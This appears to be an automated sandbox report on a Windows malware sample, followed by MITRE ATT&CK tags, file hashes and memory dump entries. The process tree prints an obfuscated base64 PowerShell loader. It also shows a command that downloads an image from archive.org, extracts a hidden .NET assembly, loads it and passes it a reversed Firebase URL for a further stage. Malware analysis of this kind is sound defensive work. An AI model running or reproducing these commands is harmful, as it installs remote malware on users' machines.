▿bQBt⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿bgBk⟑ ㏏ ䷆ ⋀ ▿Ck⟑ ㏏ ䷆ ⋀ ▿Ow⟑ ㏏ ䷆ ⋀ ▿k⟑ ㏏ ䷆ ⋀ ▿Gw⟑ ㏏ ䷆ ⋀ ▿bwBh⟑ ㏏ ䷆ ⋀ ▿GQ⟑ ㏏ ䷆ ⋀ ▿ZQBk⟑ ㏏ ䷆ ⋀ ▿EE⟑ ㏏ ䷆ ⋀ ▿cwBz⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿bQBi⟑ ㏏ ䷆ ⋀ ▿Gw⟑ ㏏ ䷆ ⋀ ▿eQ⟑ ㏏ ䷆ ⋀ ▿g⟑ ㏏ ䷆ ⋀ ▿D0⟑ ㏏ ䷆ ⋀ ▿I⟑ ㏏ ䷆ ⋀ ▿Bb⟑ ㏏ ䷆ ⋀ ▿FM⟑ ㏏ ䷆ ⋀ ▿eQBz⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿ZQBt⟑ ㏏ ䷆ ⋀ ▿C4⟑ ㏏ ䷆ ⋀ ▿UgBl⟑ ㏏ ䷆ ⋀ ▿GY⟑ ㏏ ䷆ ⋀ ▿b⟑ ㏏ ䷆ ⋀ ▿Bl⟑ ㏏ ䷆ ⋀ ▿GM⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿Bp⟑ ㏏ ䷆ ⋀ ▿G8⟑ ㏏ ䷆ ⋀ ▿bg⟑ ㏏ ䷆ ⋀ ▿u⟑ ㏏ ䷆ ⋀ ▿EE⟑ ㏏ ䷆ ⋀ ▿cwBz⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿bQBi⟑ ㏏ ䷆ ⋀ ▿Gw⟑ ㏏ ䷆ ⋀ ▿eQBd⟑ ㏏ ䷆ ⋀ ▿Do⟑ ㏏ ䷆ ⋀ ▿OgBM⟑ ㏏ ䷆ ⋀ ▿G8⟑ ㏏ ䷆ ⋀ ▿YQBk⟑ ㏏ ䷆ ⋀ ▿Cg⟑ ㏏ ䷆ ⋀ ▿J⟑ ㏏ ䷆ ⋀ ▿Bj⟑ ㏏ ䷆ ⋀ ▿G8⟑ ㏏ ䷆ ⋀ ▿bQBt⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿bgBk⟑ ㏏ ䷆ ⋀ ▿EI⟑ ㏏ ䷆ ⋀ ▿eQB0⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿cw⟑ ㏏ ䷆ ⋀ ▿p⟑ ㏏ ䷆ ⋀ ▿Ds⟑ ㏏ ䷆ ⋀ ▿J⟑ ㏏ ䷆ ⋀ ▿B0⟑ ㏏ ䷆ ⋀ ▿Hk⟑ ㏏ ䷆ ⋀ ▿c⟑ ㏏ ䷆ ⋀ ▿Bl⟑ ㏏ ䷆ ⋀ ▿C⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿PQ⟑ ㏏ ䷆ ⋀ ▿g⟑ ㏏ ䷆ ⋀ ▿CQ⟑ ㏏ ䷆ ⋀ ▿b⟑ ㏏ ䷆ ⋀ ▿Bv⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿Z⟑ ㏏ ䷆ ⋀ ▿Bl⟑ ㏏ ䷆ ⋀ ▿GQ⟑ ㏏ ䷆ ⋀ ▿QQBz⟑ ㏏ ䷆ ⋀ ▿HM⟑ ㏏ ䷆ ⋀ ▿ZQBt⟑ ㏏ ䷆ ⋀ ▿GI⟑ ㏏ ䷆ ⋀ ▿b⟑ ㏏ ䷆ ⋀ ▿B5⟑ ㏏ ䷆ ⋀ ▿C4⟑ ㏏ ䷆ ⋀ ▿RwBl⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿V⟑ ㏏ ䷆ ⋀ ▿B5⟑ ㏏ ䷆ ⋀ ▿H⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿ZQ⟑ ㏏ ䷆ ⋀ ▿o⟑ ㏏ ䷆ ⋀ ▿Cc⟑ ㏏ ䷆ ⋀ ▿Z⟑ ㏏ ䷆ ⋀ ▿Bu⟑ ㏏ ䷆ ⋀ ▿Gw⟑ ㏏ ䷆ ⋀ ▿aQBi⟑ ㏏ ䷆ ⋀ ▿C4⟑ ㏏ ䷆ ⋀ ▿SQBP⟑ ㏏ ䷆ ⋀ ▿C4⟑ ㏏ ䷆ ⋀ ▿S⟑ ㏏ ䷆ ⋀ ▿Bv⟑ ㏏ ䷆ ⋀ ▿G0⟑ ㏏ ䷆ ⋀ ▿ZQ⟑ ㏏ ䷆ ⋀ ▿n⟑ ㏏ ䷆ ⋀ ▿Ck⟑ ㏏ ䷆ ⋀ ▿Ow⟑ ㏏ ䷆ ⋀ ▿k⟑ ㏏ ䷆ ⋀ ▿G0⟑ ㏏ ䷆ ⋀ ▿ZQB0⟑ ㏏ ䷆ ⋀ ▿Gg⟑ ㏏ ䷆ ⋀ ▿bwBk⟑ ㏏ ䷆ ⋀ ▿C⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿PQ⟑ ㏏ ䷆ ⋀ ▿g⟑ ㏏ ䷆ ⋀ ▿CQ⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿B5⟑ ㏏ ䷆ ⋀ ▿H⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿ZQ⟑ ㏏ ䷆ ⋀ ▿u⟑ ㏏ ䷆ ⋀ ▿Ec⟑ ㏏ ䷆ ⋀ ▿ZQB0⟑ ㏏ ䷆ ⋀ ▿E0⟑ ㏏ ䷆ ⋀ ▿ZQB0⟑ ㏏ ䷆ ⋀ ▿Gg⟑ ㏏ ䷆ ⋀ ▿bwBk⟑ ㏏ ䷆ ⋀ ▿Cg⟑ ㏏ ䷆ ⋀ ▿JwBW⟑ ㏏ ䷆ ⋀ ▿EE⟑ ㏏ ䷆ ⋀ ▿SQ⟑ ㏏ ䷆ ⋀ ▿n⟑ ㏏ ䷆ ⋀ ▿Ck⟑ ㏏ ䷆ ⋀ ▿LgBJ⟑ ㏏ ䷆ ⋀ ▿G4⟑ ㏏ ䷆ ⋀ ▿dgBv⟑ ㏏ ䷆ ⋀ ▿Gs⟑ ㏏ ䷆ ⋀ ▿ZQ⟑ ㏏ ䷆ ⋀ ▿o⟑ ㏏ ䷆ ⋀ ▿CQ⟑ ㏏ ䷆ ⋀ ▿bgB1⟑ ㏏ ䷆ ⋀ ▿Gw⟑ ㏏ ䷆ ⋀ ▿b⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿s⟑ ㏏ ䷆ ⋀ ▿C⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿WwBv⟑ ㏏ ䷆ ⋀ ▿GI⟑ ㏏ ䷆ ⋀ ▿agBl⟑ ㏏ ䷆ ⋀ ▿GM⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿Bb⟑ ㏏ ䷆ ⋀ ▿F0⟑ ㏏ ䷆ ⋀ ▿XQ⟑ ㏏ ䷆ ⋀ ▿g⟑ ㏏ ䷆ ⋀ ▿Cg⟑ ㏏ ䷆ ⋀ ▿JwBm⟑ ㏏ ䷆ ⋀ ▿GQ⟑ ㏏ ䷆ ⋀ ▿Ng⟑ ㏏ ䷆ ⋀ ▿1⟑ ㏏ ䷆ ⋀ ▿DM⟑ ㏏ ䷆ ⋀ ▿NQBk⟑ ㏏ ䷆ ⋀ ▿GQ⟑ ㏏ ䷆ ⋀ ▿O⟑ ㏏ ䷆ ⋀ ▿Bj⟑ ㏏ ䷆ ⋀ ▿DE⟑ ㏏ ䷆ ⋀ ▿NQ⟑ ㏏ ䷆ ⋀ ▿t⟑ ㏏ ䷆ ⋀ ▿GM⟑ ㏏ ䷆ ⋀ ▿YQ⟑ ㏏ ䷆ ⋀ ▿2⟑ ㏏ ䷆ ⋀ ▿Dg⟑ ㏏ ䷆ ⋀ ▿LQBj⟑ ㏏ ䷆ ⋀ ▿DU⟑ ㏏ ䷆ ⋀ ▿N⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿0⟑ ㏏ ䷆ ⋀ ▿C0⟑ ㏏ ䷆ ⋀ ▿Nw⟑ ㏏ ䷆ ⋀ ▿0⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿ZQ⟑ ㏏ ䷆ ⋀ ▿t⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿M⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿5⟑ ㏏ ䷆ ⋀ ▿GY⟑ ㏏ ䷆ ⋀ ▿NQ⟑ ㏏ ䷆ ⋀ ▿5⟑ ㏏ ䷆ ⋀ ▿DE⟑ ㏏ ䷆ ⋀ ▿ZQ⟑ ㏏ ䷆ ⋀ ▿9⟑ ㏏ ䷆ ⋀ ▿G4⟑ ㏏ ䷆ ⋀ ▿ZQBr⟑ ㏏ ䷆ ⋀ ▿G8⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿m⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿aQBk⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿bQ⟑ ㏏ ䷆ ⋀ ▿9⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿b⟑ ㏏ ䷆ ⋀ ▿Bh⟑ ㏏ ䷆ ⋀ ▿D8⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿B4⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿Lg⟑ ㏏ ䷆ ⋀ ▿x⟑ ㏏ ䷆ ⋀ ▿D⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿N⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿y⟑ ㏏ ䷆ ⋀ ▿D⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿Mg⟑ ㏏ ䷆ ⋀ ▿4⟑ ㏏ ䷆ ⋀ ▿D⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿NQ⟑ ㏏ ䷆ ⋀ ▿w⟑ ㏏ ䷆ ⋀ ▿G0⟑ ㏏ ䷆ ⋀ ▿cgBv⟑ ㏏ ䷆ ⋀ ▿Hc⟑ ㏏ ䷆ ⋀ ▿e⟑ ㏏ ䷆ ⋀ ▿Bl⟑ ㏏ ䷆ ⋀ ▿G4⟑ ㏏ ䷆ ⋀ ▿bwBs⟑ ㏏ ䷆ ⋀ ▿C8⟑ ㏏ ䷆ ⋀ ▿bw⟑ ㏏ ䷆ ⋀ ▿v⟑ ㏏ ䷆ ⋀ ▿G0⟑ ㏏ ䷆ ⋀ ▿bwBj⟑ ㏏ ䷆ ⋀ ▿C4⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿Bv⟑ ㏏ ䷆ ⋀ ▿H⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿cwBw⟑ ㏏ ䷆ ⋀ ▿H⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿YQ⟑ ㏏ ䷆ ⋀ ▿u⟑ ㏏ ䷆ ⋀ ▿DQ⟑ ㏏ ䷆ ⋀ ▿Mg⟑ ㏏ ䷆ ⋀ ▿w⟑ ㏏ ䷆ ⋀ ▿DI⟑ ㏏ ䷆ ⋀ ▿cwB0⟑ ㏏ ䷆ ⋀ ▿H⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿eQBy⟑ ㏏ ䷆ ⋀ ▿GM⟑ ㏏ ䷆ ⋀ ▿LwBi⟑ ㏏ ䷆ ⋀ ▿C8⟑ ㏏ ䷆ ⋀ ▿M⟑ ㏏ ䷆ ⋀ ▿B2⟑ ㏏ ䷆ ⋀ ▿C8⟑ ㏏ ䷆ ⋀ ▿bQBv⟑ ㏏ ䷆ ⋀ ▿GM⟑ ㏏ ䷆ ⋀ ▿LgBz⟑ ㏏ ䷆ ⋀ ▿Gk⟑ ㏏ ䷆ ⋀ ▿c⟑ ㏏ ䷆ ⋀ ▿Bh⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿b⟑ ㏏ ䷆ ⋀ ▿Bn⟑ ㏏ ䷆ ⋀ ▿G8⟑ ㏏ ䷆ ⋀ ▿bwBn⟑ ㏏ ䷆ ⋀ ▿C4⟑ ㏏ ䷆ ⋀ ▿ZQBn⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿cgBv⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿cwBl⟑ ㏏ ䷆ ⋀ ▿HM⟑ ㏏ ䷆ ⋀ ▿YQBi⟑ ㏏ ䷆ ⋀ ▿GU⟑ ㏏ ䷆ ⋀ ▿cgBp⟑ ㏏ ䷆ ⋀ ▿GY⟑ ㏏ ䷆ ⋀ ▿Lw⟑ ㏏ ䷆ ⋀ ▿v⟑ ㏏ ䷆ ⋀ ▿Do⟑ ㏏ ䷆ ⋀ ▿cwBw⟑ ㏏ ䷆ ⋀ ▿HQ⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿Bo⟑ ㏏ ䷆ ⋀ ▿Cc⟑ ㏏ ䷆ ⋀ ▿I⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿s⟑ ㏏ ䷆ ⋀ ▿C⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿Jw⟑ ㏏ ䷆ ⋀ ▿x⟑ ㏏ ䷆ ⋀ ▿Cc⟑ ㏏ ䷆ ⋀ ▿I⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿s⟑ ㏏ ䷆ ⋀ ▿C⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿JwBD⟑ ㏏ ䷆ ⋀ ▿Do⟑ ㏏ ䷆ ⋀ ▿X⟑ ㏏ ䷆ ⋀ ▿BQ⟑ ㏏ ䷆ ⋀ ▿HI⟑ ㏏ ䷆ ⋀ ▿bwBn⟑ ㏏ ䷆ ⋀ ▿HI⟑ ㏏ ䷆ ⋀ ▿YQBt⟑ ㏏ ䷆ ⋀ ▿EQ⟑ ㏏ ䷆ ⋀ ▿YQB0⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿X⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿n⟑ ㏏ ䷆ ⋀ ▿C⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿L⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿g⟑ ㏏ ䷆ ⋀ ▿Cc⟑ ㏏ ䷆ ⋀ ▿aQBu⟑ ㏏ ䷆ ⋀ ▿GM⟑ ㏏ ䷆ ⋀ ▿dQBy⟑ ㏏ ䷆ ⋀ ▿Gk⟑ ㏏ ䷆ ⋀ ▿bwBz⟑ ㏏ ䷆ ⋀ ▿G8⟑ ㏏ ䷆ ⋀ ▿Jw⟑ ㏏ ䷆ ⋀ ▿s⟑ ㏏ ䷆ ⋀ ▿Cc⟑ ㏏ ䷆ ⋀ ▿QQBk⟑ ㏏ ䷆ ⋀ ▿GQ⟑ ㏏ ䷆ ⋀ ▿SQBu⟑ ㏏ ䷆ ⋀ ▿F⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿cgBv⟑ ㏏ ䷆ ⋀ ▿GM⟑ ㏏ ䷆ ⋀ ▿ZQBz⟑ ㏏ ䷆ ⋀ ▿HM⟑ ㏏ ䷆ ⋀ ▿Mw⟑ ㏏ ䷆ ⋀ ▿y⟑ ㏏ ䷆ ⋀ ▿Cc⟑ ㏏ ䷆ ⋀ ▿L⟑ ㏏ ䷆ ⋀ ▿⟑ ㏏ ䷆ ⋀ ▿n⟑ ㏏ ䷆ ⋀ ▿GQ⟑ ㏏ ䷆ ⋀ ▿ZQBz⟑ ㏏ ䷆ ⋀ ▿GE⟑ ㏏ ䷆ ⋀ ▿d⟑ ㏏ ䷆ ⋀ ▿Bp⟑ ㏏ ䷆ ⋀ ▿HY⟑ ㏏ ䷆ ⋀ ▿YQBk⟑ ㏏ ䷆ ⋀ ▿G8⟑ ㏏ ䷆ ⋀ ▿Jw⟑ ㏏ ䷆ ⋀ ▿p⟑ ㏏ ䷆ ⋀ ▿Ck⟑ ㏏ ䷆ ⋀ ▿';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo.replace('⟑ ㏏ ䷆ ⋀ ▿','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2080
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601606.us.archive.org/10/items/deathnote_202407/deathnote.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('fd6535dd8c15-ca68-c544-74ae-a09f591e=nekot&aidem=tla?txt.1042028050mrowxenol/o/moc.topsppa.4202stpyrc/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , '1' , 'C:\ProgramData\' , 'incurioso','AddInProcess32','desativado'))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2312

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

2

T1059

JavaScript

1

T1059.007

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
73d7d5dc121c5663c92668067081a3f3

SHA1
ff1e6509c4a06ab3bdd4c7160d7bd171a18b1068

SHA256
4de0400235addf66b141b99aebe6c52196d0eb395e4bd6b9abbddb43575d72b5

SHA512
04a6c25880611effbbf3920b2008062459d4b20a8e4e9b9145b5bf157e49e5852a520da3412f792aa537108c13797dc35208ecefa4fddd8056ba22b7f63633b7

Download Submit
memory/2080-4-0x000007FEF594E000-0x000007FEF594F000-memory.dmp

Filesize
4KB

Download
memory/2080-6-0x0000000002860000-0x0000000002868000-memory.dmp

Filesize
32KB

Download
memory/2080-5-0x000000001B790000-0x000000001BA72000-memory.dmp

Filesize
2.9MB

Download
memory/2080-7-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

Filesize
9.6MB

Download
memory/2080-8-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

Filesize
9.6MB

Download
memory/2080-9-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

Filesize
9.6MB

Download
memory/2080-10-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

Filesize
9.6MB

Download
memory/2080-11-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

Filesize
9.6MB

Download
memory/2080-17-0x000007FEF5690000-0x000007FEF602D000-memory.dmp

Filesize
9.6MB

Download

Analysis

Sharing